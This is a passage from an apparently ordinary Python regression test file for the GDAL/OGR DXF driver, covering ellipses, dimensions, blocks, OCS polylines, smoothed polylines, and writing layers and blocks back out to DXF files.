    fc = gdaltest.dxf_layer.GetFeatureCount()
    if fc != 22:
        gdaltest.post_reason( 'did not get expected feature count, got %d' % fc)
        return 'fail'

    # Setup the utf-8 string.
    if version_info >= (3,0,0):
        gdaltest.sample_text = 'Text Sample1\u00BF\u03BB\n"abc"'
        gdaltest.sample_style = 'Text Sample1\u00BF\u03BB\n\\"abc\\"'
    else:
        # Python 2 path: build the unicode literal via exec so this module
        # still parses under Python 3, then encode both samples to utf-8
        # byte strings as the py2 bindings return.
        exec("gdaltest.sample_text =  u'Text Sample1\u00BF\u03BB'")
        gdaltest.sample_text += chr(10)

        gdaltest.sample_style = gdaltest.sample_text + '\\"abc\\"'
        gdaltest.sample_style = gdaltest.sample_style.encode('utf-8')

        gdaltest.sample_text += '"abc"'
        gdaltest.sample_text = gdaltest.sample_text.encode('utf-8')

    return 'success'
###############################################################################
# Read the first feature, an ellipse and see if it generally meets expectations.
def ogr_dxf_2():
    """Read the first feature, an ellipse, and see if it generally meets expectations.

    Checks layer/FID/SubClasses/LineType/EntityHandle attributes, the PEN
    style string, and that the ellipse was tessellated into a 25D linestring
    with the expected envelope area and start point.
    """
    gdaltest.dxf_layer.ResetReading()

    feat = gdaltest.dxf_layer.GetNextFeature()

    if feat.Layer != '0':
        gdaltest.post_reason( 'did not get expected layer for feature 0' )
        return 'fail'

    if feat.GetFID() != 0:
        gdaltest.post_reason( 'did not get expected fid for feature 0' )
        return 'fail'

    if feat.SubClasses != 'AcDbEntity:AcDbEllipse':
        gdaltest.post_reason( 'did not get expected SubClasses on feature 0.' )
        return 'fail'

    if feat.LineType != 'ByLayer':
        gdaltest.post_reason( 'Did not get expected LineType' )
        return 'fail'

    if feat.EntityHandle != '43':
        gdaltest.post_reason( 'did not get expected EntityHandle' )
        return 'fail'

    if feat.GetStyleString() != 'PEN(c:#000000)':
        print( '%s' % feat.GetStyleString())
        gdaltest.post_reason( 'did not get expected style string on feat 0.' )
        return 'fail'

    geom = feat.GetGeometryRef()
    if geom.GetGeometryType() != ogr.wkbLineString25D:
        gdaltest.post_reason( 'did not get expected geometry type.' )
        return 'fail'

    # Validate the tessellated arc through its bounding-box area
    # (exact vertex coordinates depend on the tessellation step).
    envelope = geom.GetEnvelope()
    area = (envelope[1] - envelope[0]) * (envelope[3] - envelope[2])
    exp_area = 1596.12

    if area < exp_area - 0.5 or area > exp_area + 0.5:
        gdaltest.post_reason( 'envelope area not as expected, got %g.' % area )
        return 'fail'

    # The first vertex should sit at the arc's start point.
    if abs(geom.GetX(0)-73.25) > 0.001 or abs(geom.GetY(0)-139.75) > 0.001:
        gdaltest.post_reason( 'first point (%g,%g) not expected location.' \
                              % (geom.GetX(0),geom.GetY(0)) )
        return 'fail'

    return 'success'
###############################################################################
# Second feature should be a partial ellipse.
def ogr_dxf_3():
    """Second feature of assorted.dxf should be a partial ellipse."""
    feat = gdaltest.dxf_layer.GetNextFeature()
    geom = feat.GetGeometryRef()

    # Sanity-check the tessellated arc through its bounding-box area.
    x_min, x_max, y_min, y_max = geom.GetEnvelope()
    area = (x_max - x_min) * (y_max - y_min)
    exp_area = 311.864

    if area < exp_area - 0.5 or area > exp_area + 0.5:
        gdaltest.post_reason( 'envelope area not as expected, got %g.' % area )
        return 'fail'

    # The first vertex should sit at the arc's start point.
    x0, y0 = geom.GetX(0), geom.GetY(0)
    if abs(x0 - 61.133) > 0.01 or abs(y0 - 103.592) > 0.01:
        gdaltest.post_reason( 'first point (%g,%g) not expected location.' \
                              % (x0, y0) )
        return 'fail'

    return 'success'
###############################################################################
# Third feature: point.
def ogr_dxf_4():
    """Third feature of assorted.dxf: a POINT entity."""
    feat = gdaltest.dxf_layer.GetNextFeature()

    # check_feature_geometry() returns nonzero on mismatch.
    mismatch = ogrtest.check_feature_geometry( feat, 'POINT (83.5 160.0 0)' )
    return 'fail' if mismatch else 'success'
###############################################################################
# Fourth feature: LINE
def ogr_dxf_5():
    """Fourth feature of assorted.dxf: a LINE entity, which must stay 3D."""
    feat = gdaltest.dxf_layer.GetNextFeature()

    if ogrtest.check_feature_geometry( feat, 'LINESTRING (97.0 159.5 0,108.5 132.25 0)' ):
        return 'fail'

    # A plain (2D) linestring type here would mean the Z values were dropped.
    geom_type = feat.GetGeometryRef().GetGeometryType()
    if geom_type == ogr.wkbLineString:
        gdaltest.post_reason( 'not keeping 3D linestring as 3D' )
        return 'fail'

    return 'success'
###############################################################################
# Fourth feature: MTEXT
def ogr_dxf_6():
    """Fifth feature of assorted.dxf: an MTEXT entity, kept 2D with its style."""
    feat = gdaltest.dxf_layer.GetNextFeature()

    if ogrtest.check_feature_geometry( feat, 'POINT (84 126)' ):
        return 'fail'

    # A 25D point would mean a spurious Z was added to the 2D text anchor.
    if feat.GetGeometryRef().GetGeometryType() == ogr.wkbPoint25D:
        gdaltest.post_reason( 'not keeping 2D text as 2D' )
        return 'fail'

    expected = 'LABEL(f:"Arial",t:"Test",a:30,s:5g,p:7,c:#000000)'
    if feat.GetStyleString() != expected:
        print(feat.GetStyleString())
        gdaltest.post_reason( 'got wrong style string' )
        return 'fail'

    return 'success'
###############################################################################
# Partial CIRCLE
def ogr_dxf_7():
    """Check the partial CIRCLE entity by envelope area and start vertex."""
    feat = gdaltest.dxf_layer.GetNextFeature()
    geom = feat.GetGeometryRef()

    envelope = geom.GetEnvelope()
    x_min, x_max, y_min, y_max = envelope
    area = (x_max - x_min) * (y_max - y_min)
    exp_area = 445.748

    if area < exp_area - 0.5 or area > exp_area + 0.5:
        print(envelope)
        gdaltest.post_reason( 'envelope area not as expected, got %g.' % area )
        return 'fail'

    x0, y0 = geom.GetX(0), geom.GetY(0)
    if abs(x0 - 115.258) > 0.01 or abs(y0 - 107.791) > 0.01:
        gdaltest.post_reason( 'first point (%g,%g) not expected location.' \
                              % (x0, y0) )
        return 'fail'

    return 'success'
###############################################################################
# Dimension
def ogr_dxf_8():
    """Check the DIMENSION entity.

    A dimension expands to: a multilinestring of dimension/extension lines,
    two arrowhead polygons, and a text feature with a LABEL style.
    """
    # Skip boring line.
    feat = gdaltest.dxf_layer.GetNextFeature()

    # Dimension lines
    feat = gdaltest.dxf_layer.GetNextFeature()
    geom = feat.GetGeometryRef()

    if geom.GetGeometryType() != ogr.wkbMultiLineString:
        gdaltest.post_reason( 'did not get expected geometry type.' )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'MULTILINESTRING ((63.8628719444825 149.209935992088,24.3419606685507 111.934531038653),(72.3255686642474 140.237438265109,63.0051995752285 150.119275371538),(32.8046573883157 102.962033311673,23.4842882992968 112.843870418103))' ):
        return 'fail'

    # Dimension arrowheads (one small triangle polygon per end)
    feat = gdaltest.dxf_layer.GetNextFeature()
    geom = feat.GetGeometryRef()

    if geom.GetGeometryType() != ogr.wkbPolygon25D:
        gdaltest.post_reason( 'did not get expected geometry type.' )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((61.7583023958313 147.797704380064 0,63.8628719444825 149.209935992088 0,62.3300839753339 147.191478127097 0,61.7583023958313 147.797704380064 0))' ):
        return 'fail'

    feat = gdaltest.dxf_layer.GetNextFeature()
    geom = feat.GetGeometryRef()

    if geom.GetGeometryType() != ogr.wkbPolygon25D:
        gdaltest.post_reason( 'did not get expected geometry type.' )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((26.4465302172018 113.346762650677 0,24.3419606685507 111.934531038653 0,25.8747486376992 113.952988903644 0,26.4465302172018 113.346762650677 0))' ):
        return 'fail'

    # Dimension text
    feat = gdaltest.dxf_layer.GetNextFeature()
    geom = feat.GetGeometryRef()
    if ogrtest.check_feature_geometry( feat, 'POINT (42.815907752635709 131.936242584545397)' ):
        return 'fail'

    expected_style = 'LABEL(f:"Arial",t:"54.33",p:5,a:43.3,s:2.5g,c:#000000)'
    if feat.GetStyleString() != expected_style:
        gdaltest.post_reason( 'Got unexpected style string:\n%s\ninstead of:\n%s' % (feat.GetStyleString(),expected_style) )
        return 'fail'

    return 'success'
###############################################################################
# BLOCK (inlined)
def ogr_dxf_9():
    """Check a BLOCK reference with blocks inlined (default DXF_INLINE_BLOCKS).

    The block expands in place to a merged multilinestring plus two MTEXT
    features; the text samples were prepared in ogr_dxf_1.
    """
    # Skip two dimensions each with a line, two arrowheads and text.
    for x in range(8):
        feat = gdaltest.dxf_layer.GetNextFeature()

    # block (merged geometries)
    feat = gdaltest.dxf_layer.GetNextFeature()
    geom = feat.GetGeometryRef()

    if geom.GetGeometryType() != ogr.wkbMultiLineString25D:
        gdaltest.post_reason( 'did not get expected geometry type.' )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'MULTILINESTRING ((79.069506278985116 121.003652476272777 0,79.716898725419625 118.892590150942851 0),(79.716898725419625 118.892590150942851 0,78.140638855839953 120.440702522851453 0),(78.140638855839953 120.440702522851453 0,80.139111190485622 120.328112532167196 0),(80.139111190485622 120.328112532167196 0,78.619146316248077 118.920737648613908 0),(78.619146316248077 118.920737648613908 0,79.041358781314059 120.975504978601705 0))' ):
        return 'fail'

    # First of two MTEXTs
    feat = gdaltest.dxf_layer.GetNextFeature()
    if feat.GetField( 'Text' ) != gdaltest.sample_text:
        gdaltest.post_reason( 'Did not get expected first mtext.' )
        return 'fail'

    expected_style = 'LABEL(f:"Arial",t:"'+gdaltest.sample_style+'",a:45,s:0.5g,p:5,c:#000000)'
    if feat.GetStyleString() != expected_style:
        gdaltest.post_reason( 'Got unexpected style string:\n%s\ninstead of:\n%s.' % (feat.GetStyleString(),expected_style) )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'POINT (77.602201427662891 120.775897075866169 0)' ):
        return 'fail'

    # Second of two MTEXTs
    feat = gdaltest.dxf_layer.GetNextFeature()
    if feat.GetField( 'Text' ) != 'Second':
        gdaltest.post_reason( 'Did not get expected second mtext.' )
        return 'fail'

    if feat.GetField( 'SubClasses' ) != 'AcDbEntity:AcDbMText':
        gdaltest.post_reason( 'Did not get expected subclasses.' )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'POINT (79.977331629005178 119.698291706738644 0)' ):
        return 'fail'

    return 'success'
###############################################################################
# LWPOLYLINE in an Object Coordinate System.
def ogr_dxf_10():
    """Check LWPOLYLINE entities in an Object Coordinate System (OCS).

    Verifies that OCS coordinates are transformed to world coordinates,
    both for a plain LWPOLYLINE and for one containing bulge (arc) segments
    which are tessellated into many vertices.
    """
    ocs_ds = ogr.Open('data/LWPOLYLINE-OCS.dxf')
    ocs_lyr = ocs_ds.GetLayer(0)

    # Skip boring line.
    feat = ocs_lyr.GetNextFeature()

    # LWPOLYLINE in OCS
    feat = ocs_lyr.GetNextFeature()
    geom = feat.GetGeometryRef()

    if geom.GetGeometryType() != ogr.wkbLineString25D:
        print(geom.GetGeometryType())
        gdaltest.post_reason( 'did not get expected geometry type.' )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'LINESTRING (600325.567999998573214 3153021.253000000491738 562.760000000052969,600255.215999998385087 3151973.98600000096485 536.950000000069849,597873.927999997511506 3152247.628000000491738 602.705000000089058)' ):
        return 'fail'

    # LWPOLYLINE in OCS with bulge
    feat = ocs_lyr.GetFeature(12)

    if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (611415.459819656 3139300.00002682 1807.37309215522,611245.079665823 3139720.59876424 1807.37309215522,611245.079665823 3139720.59876424 1807.37309215522,611244.054791235 3139723.12875936 1807.27984293229,611243.034695086 3139725.64695847 1807.00053001486,611242.024133533 3139728.14162057 1806.53645568869,611241.027818282 3139730.6011144 1805.88978368251,611240.050394615 3139733.01397265 1805.06352907972,611239.096419732 3139735.36894547 1804.06154426071,611238.170341503 3139737.65505289 1802.88850094122,611237.276477734 3139739.86163602 1801.54986839073,611236.418996029 3139741.97840675 1800.0518879321,611235.601894365 3139743.99549572 1798.40154384175,611234.828982446 3139745.90349832 1796.60653078564,611234.103863944 3139747.69351857 1794.67521794327,611233.429919697 3139749.35721058 1792.61660998662,611232.810291944 3139750.88681743 1790.44030509629,611232.247869676 3139752.27520739 1788.15645021029,611231.745275164 3139753.51590716 1785.77569371438,611231.304851737 3139754.60313201 1783.30913579435,611230.928652852 3139755.5318128 1780.76827668182,611230.618432521 3139756.29761959 1778.16496303489,611230.375637135 3139756.89698184 1775.51133270351,611230.201398719 3139757.32710505 1772.81975813727,611230.096529651 3139757.58598378 1770.10278869926,611230.06151888 3139757.67241101 1767.37309215522,611230.06151892 3139757.67241089 1661.18408370228,611230.06151892 3139757.67241089 1661.18408370228,611230.026508154 3139757.75883812 1658.45438717061,611229.921639091 3139758.01771683 1655.73741774404,611229.74740068 3139758.44784002 1653.04584318824,611229.5046053 3139759.04720226 1650.39221286628,611229.194384975 3139759.81300904 1647.78889922769,611228.818186096 3139760.74168982 1645.24804012238,611228.377762675 3139761.82891465 1642.78148220841,611227.87516817 3139763.0696144 1640.40072571739,611227.312745909 3139764.45800435 1638.11687083509,611226.693118163 3139765.98761118 1635.94056594722,611226.019173923 3139767.65130317 1633.88195799181,611225.294055428 3139769.4413234 1631.95064514943,611224.521143516 3139771.34932599 1630.15563209209,611223.704041858 3139773.36641494 1628.50528799927,611222.84656016 3139775.48318565 1627.00730753696,611221.952696397 3139777.68976876 1625.66867498157,611221.026618175 3139779.97587617 1624.49563165602,611220.072643298 3139782.33084897 1623.49364682979,611219.095219637 3139784.74370721 1622.66739221866,611218.098904392 3139787.20320102 1622.02072020306,611217.088342845 3139789.69786311 1621.55664586644,' +
                                       '611216.0682467 3139792.21606221 1621.27733293758,611215.043372117 3139794.74605732 1621.18408370228,610905.973331759 3140557.71325641 1621.18408370228,610905.973331759 3140557.71325641 1621.18408370228,610904.948457176 3140560.24325151 1621.2773329396,610903.928361033 3140562.76145061 1621.55664587034,610902.917799487 3140565.2561127 1622.02072020868,610901.921484243 3140567.71560651 1622.66739222582,610900.944060583 3140570.12846474 1623.49364683831,610899.990085707 3140572.48343755 1624.49563166573,610899.064007486 3140574.76954495 1625.66867499227,610898.170143725 3140576.97612806 1627.00730754846,610897.312662028 3140579.09289877 1628.50528801138,610896.495560372 3140581.10998771 1630.1556321046,610895.722648461 3140583.0179903 1631.95064516215,610894.997529967 3140584.80801053 1633.88195800453,610894.323585729 3140586.47170251 1635.94056595974,610893.703957984 3140588.00130935 1638.1168708472,610893.141535724 3140589.38969929 1640.4007257289,610892.63894122 3140590.63039904 1642.78148221912,610892.198517801 3140591.71762387 1645.2480401321,610891.822318923 3140592.64630464 1647.78889923622,610891.5120986 3140593.41211142 1650.39221287345,610891.269303221 3140594.01147366 1653.04584319386,610891.095064811 3140594.44159685 1655.73741774794,610890.99019575 3140594.70047556 1658.45438717264,610890.955184986 3140594.78690278 1661.18408370228,610890.955185021 3140594.78690272 1752.31638281001,610890.955185021 3140594.78690271 1752.31638281001,610890.920174252 3140594.87332995 1755.04607934987,610890.815305187 3140595.13220867 1757.76304878401,610890.641066773 3140595.56233187 1760.45462334672,610890.398271389 3140596.16169412 1763.10825367492,610890.088051061 3140596.92750091 1765.71156731903,610889.711852178 3140597.85618169 1768.25242642912,610889.271428753 3140598.94340654 1770.71898434711,610888.768834244 3140600.1841063 1773.09974084137,610888.206411978 3140601.57249626 1775.38359572612,610887.586784228 3140603.1021031 1777.55990061562,610886.912839984 3140604.7657951 1779.61850857185,610886.187721485 3140606.55581535 1781.54982141423,610885.414809569 3140608.46381795 1783.34483447076,610884.597707907 3140610.48090691 1784.99517856195,610883.740226205 3140612.59767763 1786.49315902182,610882.846362438 3140614.80426075 1787.83179157397,610881.920284211 3140617.09036817 1789.0048348955,610880.96630933 3140619.44534098 1790.00681971696,610879.988885665 3140621.85819923 1790.83307432256,610878.992570417 3140624.31769305 1791.47974633192,610877.982008866 3140626.81235515 1791.94382066162,610876.961912718 3140629.33055426 1792.22313358291,610875.937038132 3140631.86054938 1792.31638281001,610699.99993399 3141066.17711854 1792.31638281001)' ):
        return 'fail'

    ocs_lyr = None
    ocs_ds = None

    return 'success'
###############################################################################
# Test reading from an entities-only dxf file (#3412)
def ogr_dxf_11():
    """Read from an entities-only DXF file (no header/tables sections, #3412)."""
    eo_ds = ogr.Open('data/entities_only.dxf')
    eo_lyr = eo_ds.GetLayer(0)

    # Both point entities should come through with their full 3D coordinates.
    expected_wkts = (
        'POINT (672500.0 242000.0 539.986)',
        'POINT (672750.0 242000.0 558.974)',
    )
    for wkt in expected_wkts:
        feat = eo_lyr.GetNextFeature()
        if ogrtest.check_feature_geometry( feat, wkt ):
            return 'fail'

    eo_lyr = None
    eo_ds = None

    return 'success'
###############################################################################
# Write a simple file with a polygon and a line, and read back.
def _ogr_dxf_12_write_wkt( lyr, wkt ):
    # Helper: create one feature on lyr from a WKT string.
    dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
    dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( wkt ) )
    lyr.CreateFeature( dst_feat )

def ogr_dxf_12():
    """Write a simple file with a polygon and a line, and read back.

    Also covers 25D linestrings with constant and varying Z (#5210).
    Fixes: removed a duplicated 'ds = None' and factored the repeated
    feature-creation boilerplate into a private helper.
    """
    ds = ogr.GetDriverByName('DXF').CreateDataSource('tmp/dxf_11.dxf' )
    lyr = ds.CreateLayer( 'entities' )

    _ogr_dxf_12_write_wkt( lyr, 'LINESTRING(10 12, 60 65)' )
    _ogr_dxf_12_write_wkt( lyr, 'POLYGON((0 0,100 0,100 100,0 0))' )
    # Test 25D linestring with constant Z (#5210)
    _ogr_dxf_12_write_wkt( lyr, 'LINESTRING(1 2 10,3 4 10)' )
    # Test 25D linestring with different Z (#5210)
    _ogr_dxf_12_write_wkt( lyr, 'LINESTRING(1 2 -10,3 4 10)' )

    lyr = None
    ds = None

    # Read back.
    ds = ogr.Open('tmp/dxf_11.dxf')
    lyr = ds.GetLayer(0)

    # Check first feature: the 2D line must stay strictly 2D.
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat,
                                       'LINESTRING(10 12, 60 65)' ):
        print(feat.GetGeometryRef().ExportToWkt())
        return 'fail'

    if feat.GetGeometryRef().GetGeometryType() != ogr.wkbLineString:
        gdaltest.post_reason( 'not linestring 2D' )
        return 'fail'
    feat = None

    # Check second feature: the polygon must stay strictly 2D.
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat,
                                       'POLYGON((0 0,100 0,100 100,0 0))' ):
        print(feat.GetGeometryRef().ExportToWkt())
        return 'fail'

    if feat.GetGeometryRef().GetGeometryType() != ogr.wkbPolygon:
        gdaltest.post_reason( 'not keeping polygon 2D' )
        return 'fail'
    feat = None

    # Check third feature (constant-Z 25D linestring).
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat,
                                       'LINESTRING(1 2 10,3 4 10)' ):
        print(feat.GetGeometryRef().ExportToWkt())
        return 'fail'
    feat = None

    # Check fourth feature (varying-Z 25D linestring).
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat,
                                       'LINESTRING(1 2 -10,3 4 10)' ):
        print(feat.GetGeometryRef().ExportToWkt())
        return 'fail'
    feat = None

    lyr = None
    ds = None

    os.unlink( 'tmp/dxf_11.dxf' )

    return 'success'
###############################################################################
# Check smoothed polyline.
def ogr_dxf_13():
    """Check smoothed polyline (arc-fit POLYLINE) tessellation."""
    ds = ogr.Open( 'data/polyline_smooth.dxf' )

    layer = ds.GetLayer(0)

    feat = layer.GetNextFeature()
    if feat.Layer != '1':
        gdaltest.post_reason( 'did not get expected layer for feature 0' )
        return 'fail'

    geom = feat.GetGeometryRef()
    if geom.GetGeometryType() != ogr.wkbLineString25D:
        gdaltest.post_reason( 'did not get expected geometry type.' )
        return 'fail'

    envelope = geom.GetEnvelope()
    area = (envelope[1] - envelope[0]) * (envelope[3] - envelope[2])
    exp_area = 1350.43

    if area < exp_area - 0.5 or area > exp_area + 0.5:
        gdaltest.post_reason( 'envelope area not as expected, got %g.' % area )
        return 'fail'

    # Check for specific number of points from tessellated arc(s).
    # Note that this number depends on the tessellation algorithm and
    # possibly the default global arc_stepsize variable; therefore it is
    # not guaranteed to remain constant even if the input DXF file is constant.
    # If you retain this test, you may need to update the point count if
    # changes are made to the aforementioned items. Ideally, one would test
    # only that more points are returned than in the original polyline, and
    # that the points lie along (or reasonably close to) said path.
    if geom.GetPointCount() != 146:
        gdaltest.post_reason( 'did not get expected number of points, got %d' % (geom.GetPointCount()) )
        return 'fail'

    if abs(geom.GetX(0)-251297.8179) > 0.001 \
       or abs(geom.GetY(0)-412226.8286) > 0.001:
        gdaltest.post_reason( 'first point (%g,%g) not expected location.' \
                              % (geom.GetX(0),geom.GetY(0)) )
        return 'fail'

    # Other possible tests:
    # Polylines with no explicit Z coordinates (e.g., no attribute 38 for
    # LWPOLYLINE and no attribute 30 for POLYLINE) should always return
    # geometry type ogr.wkbPolygon. Otherwise, ogr.wkbPolygon25D should be
    # returned even if the Z coordinate values are zero.
    # If the arc_stepsize global is used, one could test that returned adjacent
    # points do not slope-diverge greater than that value.
    ds = None

    return 'success'
###############################################################################
# Check smooth LWPOLYLINE entity.
def ogr_dxf_14():
    """Check smooth LWPOLYLINE entity.

    Identical to the previous POLYLINE test except that the newer
    LWPOLYLINE entity is used; see ogr_dxf_13 for caveats about the
    tessellation-dependent point count.
    """
    ds = ogr.Open( 'data/lwpolyline_smooth.dxf' )
    layer = ds.GetLayer(0)

    feat = layer.GetNextFeature()
    if feat.Layer != '1':
        gdaltest.post_reason( 'did not get expected layer for feature 0' )
        return 'fail'

    geom = feat.GetGeometryRef()
    if geom.GetGeometryType() != ogr.wkbLineString:
        gdaltest.post_reason( 'did not get expected geometry type.' )
        return 'fail'

    # Validate the tessellated result through its bounding-box area.
    x_min, x_max, y_min, y_max = geom.GetEnvelope()
    area = (x_max - x_min) * (y_max - y_min)
    exp_area = 1350.43

    if area < exp_area - 0.5 or area > exp_area + 0.5:
        gdaltest.post_reason( 'envelope area not as expected, got %g.' % area )
        return 'fail'

    # Tessellation-dependent vertex count (see ogr_dxf_13).
    point_count = geom.GetPointCount()
    if point_count != 146:
        gdaltest.post_reason( 'did not get expected number of points, got %d' % (point_count) )
        return 'fail'

    x0, y0 = geom.GetX(0), geom.GetY(0)
    if abs(x0 - 251297.8179) > 0.001 \
       or abs(y0 - 412226.8286) > 0.001:
        gdaltest.post_reason( 'first point (%g,%g) not expected location.' \
                              % (x0, y0) )
        return 'fail'

    ds = None

    return 'success'
###############################################################################
# Write a file with dynamic layer creation and confirm that the
# dynamically created layer 'abc' matches the definition of the default
# layer '0'.
def ogr_dxf_15():
    """Write a file with dynamic layer creation and confirm that the
    dynamically created layer 'abc' matches the definition of the default
    layer '0'.  Also checks that FIRST_ENTITY is honoured via $HANDSEED.

    Fixes: the failure-path debug print used txt_2[abc_off] (a single
    character) instead of the normalized slice actually compared.
    """
    ds = ogr.GetDriverByName('DXF').CreateDataSource('tmp/dxf_14.dxf',
                                                     ['FIRST_ENTITY=80'] )

    lyr = ds.CreateLayer( 'entities' )

    dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
    dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'LINESTRING(10 12, 60 65)' ) )
    dst_feat.SetField( 'Layer', 'abc' )
    lyr.CreateFeature( dst_feat )

    dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
    dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POLYGON((0 0,100 0,100 100,0 0))' ) )
    lyr.CreateFeature( dst_feat )

    lyr = None
    ds = None

    # Read back.
    ds = ogr.Open('tmp/dxf_14.dxf')
    lyr = ds.GetLayer(0)

    # Check first feature
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat,
                                       'LINESTRING(10 12, 60 65)' ):
        print(feat.GetGeometryRef().ExportToWkt())
        return 'fail'

    if feat.GetGeometryRef().GetGeometryType() == ogr.wkbLineString25D:
        gdaltest.post_reason( 'not linestring 2D' )
        return 'fail'

    if feat.GetField('Layer') != 'abc':
        gdaltest.post_reason( 'Did not get expected layer, abc.' )
        return 'fail'

    # Check second point.
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat,
                                       'POLYGON((0 0,100 0,100 100,0 0))' ):
        print(feat.GetGeometryRef().ExportToWkt())
        return 'fail'

    if feat.GetGeometryRef().GetGeometryType() == ogr.wkbPolygon25D:
        gdaltest.post_reason( 'not keeping polygon 2D' )
        return 'fail'

    if feat.GetField('Layer') != '0':
        print(feat.GetField('Layer'))
        gdaltest.post_reason( 'Did not get expected layer, 0.' )
        return 'fail'

    lyr = None
    ds = None

    # Check the DXF file itself to try and ensure that the layer
    # is defined essentially as we expect.  We assume the only thing
    # that will be different is the layer name is 'abc' instead of '0'
    # and the entity id.
    outdxf = open('tmp/dxf_14.dxf').read()
    start_1 = outdxf.find(' 0\nLAYER')
    start_2 = outdxf.find(' 0\nLAYER',start_1+10)

    txt_1 = outdxf[start_1:start_2]
    txt_2 = outdxf[start_2:start_2+len(txt_1)+2]

    abc_off = txt_2.find('abc\n')

    if txt_2[16:abc_off] + '0' + txt_2[abc_off+3:] != txt_1[16:]:
        # Print the normalized abc-layer text that was actually compared
        # (the original debug print showed only a single character).
        print(txt_2[16:abc_off] + '0' + txt_2[abc_off+3:])
        print(txt_1)
        gdaltest.post_reason( 'Layer abc does not seem to match layer 0.' )
        return 'fail'

    # Check that $HANDSEED was set as expected.
    start_seed = outdxf.find('$HANDSEED')
    handseed = outdxf[start_seed+10+4:start_seed+10+4+8]
    if handseed != '00000053':
        gdaltest.post_reason( 'Did not get expected HANDSEED, got %s.' % handseed)
        return 'fail'

    os.unlink( 'tmp/dxf_14.dxf' )

    return 'success'
###############################################################################
# Test reading without DXF blocks inlined.
def ogr_dxf_16():
    """Test reading without DXF blocks inlined.

    With DXF_INLINE_BLOCKS=FALSE the driver exposes two layers: layer 0
    ('blocks') holding block definitions, and layer 1 ('entities') where
    block references appear as point features with BlockName/Angle/Scale
    fields instead of expanded geometry.
    """
    gdal.SetConfigOption( 'DXF_INLINE_BLOCKS', 'FALSE' )

    dxf_ds = ogr.Open( 'data/assorted.dxf' )

    if dxf_ds is None:
        return 'fail'

    if dxf_ds.GetLayerCount() != 2:
        gdaltest.post_reason( 'expected exactly two layers!' )
        return 'fail'

    dxf_layer = dxf_ds.GetLayer(1)
    if dxf_layer.GetName() != 'entities':
        gdaltest.post_reason( 'did not get expected layer name.' )
        return 'fail'

    # read through till we encounter the block reference.
    feat = dxf_layer.GetNextFeature()
    while feat.GetField('EntityHandle') != '55':
        feat = dxf_layer.GetNextFeature()

    # check contents.
    if feat.GetField('BlockName') != 'STAR':
        gdaltest.post_reason( 'Did not get blockname!' )
        return 'fail'

    if feat.GetField('BlockAngle') != 0.0:
        gdaltest.post_reason( 'Did not get expected angle.' )
        return 'fail'

    if feat.GetField('BlockScale') != [1.0,1.0,1.0]:
        print(feat.GetField('BlockScale'))
        gdaltest.post_reason( 'Did not get expected BlockScale' )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'POINT (79.097653776656188 119.962195062443342 0)' ):
        return 'fail'

    feat = None

    # Now we need to check the blocks layer and ensure it is as expected.
    dxf_layer = dxf_ds.GetLayer(0)
    if dxf_layer.GetName() != 'blocks':
        gdaltest.post_reason( 'did not get expected layer name.' )
        return 'fail'

    # STAR geometry
    feat = dxf_layer.GetNextFeature()

    if feat.GetField('Block') != 'STAR':
        gdaltest.post_reason( 'Did not get expected block name.' )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'MULTILINESTRING ((-0.028147497671066 1.041457413829428 0,0.619244948763444 -1.069604911500494 0),(0.619244948763444 -1.069604911500494 0,-0.957014920816232 0.478507460408116 0),(-0.957014920816232 0.478507460408116 0,1.041457413829428 0.365917469723853 0),(1.041457413829428 0.365917469723853 0,-0.478507460408116 -1.041457413829428 0),(-0.478507460408116 -1.041457413829428 0,-0.056294995342131 1.013309916158363 0))' ):
        return 'fail'

    # First MTEXT (uses the sample text/style prepared in ogr_dxf_1)
    feat = dxf_layer.GetNextFeature()
    if feat.GetField( 'Text' ) != gdaltest.sample_text:
        gdaltest.post_reason( 'Did not get expected first mtext.' )
        return 'fail'

    expected_style = 'LABEL(f:"Arial",t:"'+gdaltest.sample_style+'",a:45,s:0.5g,p:5,c:#000000)'
    if feat.GetStyleString() != expected_style:
        gdaltest.post_reason( 'Got unexpected style string:\n%s\ninstead of:\n%s.' % (feat.GetStyleString(),expected_style) )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'POINT (-1.495452348993292 0.813702013422821 0)' ):
        return 'fail'

    # Second MTEXT
    feat = dxf_layer.GetNextFeature()
    if feat.GetField( 'Text' ) != 'Second':
        gdaltest.post_reason( 'Did not get expected second mtext.' )
        return 'fail'

    if feat.GetField( 'SubClasses' ) != 'AcDbEntity:AcDbMText':
        gdaltest.post_reason( 'Did not get expected subclasses.' )
        return 'fail'

    if ogrtest.check_feature_geometry( feat, 'POINT (0.879677852348995 -0.263903355704699 0)' ):
        return 'fail'

    feat = None

    # cleanup: restore block inlining for the tests that follow.
    gdal.SetConfigOption( 'DXF_INLINE_BLOCKS', 'TRUE' )

    return 'success'
###############################################################################
# Write a file with blocks defined from a source blocks layer.
def ogr_dxf_17():
    """Write a DXF file with blocks defined from a source 'blocks' layer,
    reference them from the entities layer (including a scaled/rotated
    reference, a reference to a template-defined block, and a reference to a
    non-existent block), then reopen the file and verify how each INSERT was
    materialised.  Returns 'success' or 'fail' (gdaltest convention)."""

    ds = ogr.GetDriverByName('DXF').CreateDataSource('tmp/dxf_17.dxf',
                                                     ['HEADER=data/header_extended.dxf'])

    blyr = ds.CreateLayer('blocks')
